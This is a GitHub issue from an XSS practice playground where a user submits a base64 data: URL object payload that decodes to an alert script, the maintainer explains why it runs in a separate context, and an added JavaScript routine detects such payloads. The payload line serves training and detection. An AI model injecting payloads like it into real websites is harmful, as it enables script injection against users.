haozi / xss-demo

👮🏻‍♂️ XSS attack playground, there are answers in issues. XSS attack-and-defense practice range; the answers are in the issues
https://xss.haozi.me

0x03 does not accept base64 encoding #2

Open lifangzheng opened 7 years ago

lifangzheng commented 7 years ago

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4="> pops an alert directly in the browser, so this should count as correct too, right?

haozi commented 6 years ago

It does not count as a pass: the newly opened context is a browsing context independent of the original page and is subject to the same-origin restriction, so the harm is much smaller.

The interception script could not capture this alert; see the source for the reason: https://github.com/haozi/xss-demo/blob/master/src/data/sandbox.raw#L10
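The maintainer's point above is that a `data:text/html` document loaded into an `<object>` runs in its own browsing context, so a hook installed on the page's `window.alert` never sees it. The following is an added example, not code from the xss-demo repository: a static check a grader or filter can run over a submission to recognise this class of payload, built from a small `data:` URL parser (the RFC 2397 shape `data:[<mediatype>][;base64],<data>` is assumed) and a scan of the context-creating elements `object`, `embed` and `iframe`.

```javascript
// Added example (not part of haozi/xss-demo): detect submissions that load an
// HTML document via a data: URL into a nested browsing context. Such a document
// has an opaque origin, so the parent page's instrumentation cannot observe it.

// Parse a data: URL into media type, base64 flag and decoded body.
// Assumes the RFC 2397 shape data:[<mediatype>][;base64],<data>.
function parseDataUrl(url) {
  const m = /^data:([^,]*?)(;base64)?,(.*)$/is.exec(String(url).trim());
  if (!m) return null;
  const mediaType = (m[1] || 'text/plain').split(';')[0].toLowerCase();
  let body;
  try {
    body = m[2]
      ? Buffer.from(m[3], 'base64').toString('utf8')
      : decodeURIComponent(m[3]);
  } catch (e) {
    return null; // malformed percent-encoding or base64
  }
  return { mediaType, base64: Boolean(m[2]), body };
}

// Scan an HTML fragment for object/embed/iframe elements whose data/src is a
// data:text/html URL and report the element plus the decoded inner document.
function findDataHtmlContexts(html) {
  const hits = [];
  const tag = /<(object|embed|iframe)\b([^>]*)>/gi;
  let t;
  while ((t = tag.exec(html)) !== null) {
    const element = t[1].toLowerCase();
    const attrName = element === 'object' ? 'data' : 'src';
    const attr = new RegExp(
      `\\b${attrName}\\s*=\\s*("([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i'
    ).exec(t[2]);
    if (!attr) continue;
    const parsed = parseDataUrl(attr[2] ?? attr[3] ?? attr[4]);
    if (parsed && parsed.mediaType === 'text/html') {
      hits.push({ element, base64: parsed.base64, body: parsed.body });
    }
  }
  return hits;
}

// Constructed sample: the submission discussed in this issue.
const sample =
  '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">';
console.log(findDataHtmlContexts(sample));
```

Running it on the issue's submission reports one `object` hit whose decoded body is `<script>alert(1);</script>`, which is the document the sandbox's alert hook could not reach.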